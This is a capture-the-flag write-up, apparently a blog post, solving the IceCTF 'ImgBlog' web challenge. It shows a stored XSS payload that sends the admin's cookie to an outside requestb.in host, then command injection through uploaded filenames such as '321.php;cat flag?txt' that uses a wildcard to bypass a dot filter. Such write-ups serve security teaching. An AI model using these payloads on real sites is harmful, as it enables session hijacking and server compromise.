[IceCTF] ImgBlog – Web130

Chall:

I found this amazing blog about Iceland! Did I ever tell you that I love Iceland? It seems to be made from scratch by a single guy although being impressive, he doesn’t seem too have much experience with web programming. Can you see if you can find any vulnerabilites to pwn his machine?

This is nice website, first we have to login to access some function of it.
This chall is about 2 stage:

Stage 1: Cross-Site Scripting

Since we login, we have cookie

session=eyJ1c2VyIjozOX0.CqHuQA._9DBnFghkXsPrugp8vYM5pYUP-8  (for me)

and there is a comment area with report button, i was thinking about XSS.

So construct the payload, post it and report to admin to leak his cookie via stored XSS.

<img src=x onerror=this.src='http://requestb.in/1k4cnub1?z='+document.cookie>

Okay thank admin, i got this gift :

hijack it:

WE ADMIN NOW!!!

Stage 2: From Upload to Command Injection

When i upload php file:

And upload zip file:

Even a ….binary file:

So what does it all means? A little google skill will tell you this website use file command of linux to determine which type of our upload file.

file 123php

And with the chain of the string, Command injection will be perfomed, let make a file named 123.php;ls :

Since they filter dot (.) , we can replace it with question mask (?). New file name is “321.php;cat flag?txt”. Isn’t it eassy huh?

1 thought on “[IceCTF] ImgBlog – Web130

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s